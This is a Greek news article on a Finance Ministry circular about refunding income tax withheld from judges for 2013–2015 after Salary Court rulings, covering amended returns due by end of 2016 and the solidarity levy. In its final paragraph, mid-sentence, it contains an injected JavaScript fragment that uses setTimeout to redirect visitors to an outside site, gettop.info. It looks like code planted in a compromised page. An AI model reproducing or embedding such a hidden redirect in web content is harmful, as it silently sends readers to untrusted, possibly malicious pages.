«Κόφτης» και στα αναδρομικά των δικαστικών

0
16

 

Ψαλιδισμένα θα επιστραφούν τα αναδρομικά στους δικαστικούς, για τις κρατήσεις φόρων εισοδήματος των περασμένων ετών, αν και κρίθηκαν παράνομες από το Μισθοδικείο.

Ενώ στις 29 Σεπτεμβρίου το υπουργείο Οικονομικών είχε δώσει εντολή να τους επιστραφούν με συνοπτικές διαδικασίες τα αναδρομικά, που σε αρκετές περιπτώσεις φθάνουν στα 15.000-20.000 ευρώ, έναν μήνα μετά, με νεότερη εγκύκλιο που εξέδωσε η ΓΓΔΕ, υποχρεώνει τους δικαστικούς, εν ενεργεία και συνταξιούχους, να σπεύσουν έως τις 31.12.2016 στις ΔΟΥ για να υποβάλουν αυτοπροσώπως τροποποιητικές δηλώσεις, διαφορετικά θα πληρώσουν πρόστιμο και ίσως χάσουν και τα αναδρομικά που δικαιούνται.

Επιπλέον, όσοι υποβάλουν τροποποιητική για να πάρουν πίσω φόρους εισοδήματος, θα πληρώσουν στο ακέραιο και χωρίς εκπτώσεις την ειδική εισφορά αλληλεγγύης.

Όπως επισημαινόταν στην εγκύκλο της 29/9 «προκειμένου να αποφευχθεί άσκοπη επιβάρυνση των δικαστηρίων και ταλαιπωρία των πολιτών, οι υπηρεσίες του Υπ. Οικονομικών θα προβούν σε νέα εκκαθάριση, υπολογίζοντας τον οφειλόμενο φόρο εισοδήματος μετά την αφαίρεση ποσοστού 25% από τις ακαθάριστες αποδοχές τους (εν ενεργεία και συντάξιμες). Το τυχόν αχρεωστήτως καταβληθέν ποσό επιστρέφεται».

Με τη νέα εγκύκλιο, η ΓΓΔΕ αναφέρει ότι:

Σε συνέχεια των υπ’ αριθμ. 89/2013 και 6/2015 αποφάσεων του Μισθοδικείου, οι υπηρεσίες του Υπ. Οικονομικών θα πρέπει να προβαίνουν σε νέα εκκαθάριση, υπολογίζοντας τον οφειλόμενο φόρο εισοδήματος μετά την αφαίρεση ποσού ίσου με το 25% του ακαθάριστου ποσού των αποδοχών τους (των εν ενεργεία και των συνταξιούχων). Το τυχόν αχρεωστήτως καταβληθέν ποσό επιστρέφεται

Η έκπτωση του 25% όμως δεν ισχύει για το ακαθάριστο εισόδημα, και συνεπώς επιβάλλεται ειδική εισφορά αλληλεγγύης και επί του ποσοστού αυτού. Συνεπώς, το συγκεκριμένο ποσό (έκπτωση 25%) θα δηλώνεται στους κωδικούς 659-660 του εντύπου Ε1 (ως εισοδήματα που απαλλάσσονται από τον φόρο ή φορολογούνται με ειδικό τρόπο).

Προκειμένου να διενεργηθεί η ως νέα εκκαθάριση για τα εισοδήματα των ετών 2013, 2014 και 2015, οι δικαιούχοι δικαστικοί λειτουργοί (εν ενεργεία και συνταξιούχοι) θα πρέπει προηγουμένως να προσέλθουν στην αρμόδια Δ.Ο.Υ. υποβάλλοντας τροποποιητικές δηλώσεις σύμφωνα με τα ανωτέρω.

Ακόμα ότι στην περίπτωση που έχουν ήδη υποβάλει τροποποιητικές δηλώσεις, αν αυτές δεν συμφωνούν με τα παραπάνω (αναγραφή του 25% στους κωδικούς 659-660) τότε απαιτείται να μεταβούν η εκ νέου στις ΔΟΥ για υποβολή τροποποιητικών δηλώσεων σύμφωνα με τα παραπάνω.

Οι τροποποιητικές δηλώσεις αυτές των δικαστικών λειτουργών, υποβάλλονται στις Δ.Ο.Υ. χωρίς κυρώσεις μέχρι και 31.12.2016. Αυτό σημαίνει ότι μετά την 1.1.2017 θα πληρώνουν το προβλεπόμενο πρόστιμο, ενώ δεν διευκρινίζεται στην εγκύκλιο και αν τυχόν κινδυνεύουν να χάσουν και κάποια από τα αναδρομικά που δικαιούνται, λόγω παραγραφής (πχ του φορολογικού έτους 2013).

Οι αρμόδιες Δ.Ο.Υ. προβαίνουν σε εκκαθάριση των τροποποιητικών αυτών δηλώσεων. Κατά την υποβολή των δηλώσεων, οι συνταξιούχοι θα πρέπει επίσης να προσκομίσουν οποιοδήποτε πρόσφορο στοιχείο από το οποίο να προκύπτει η ιδιότητα του δικαστικού λειτουργού. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here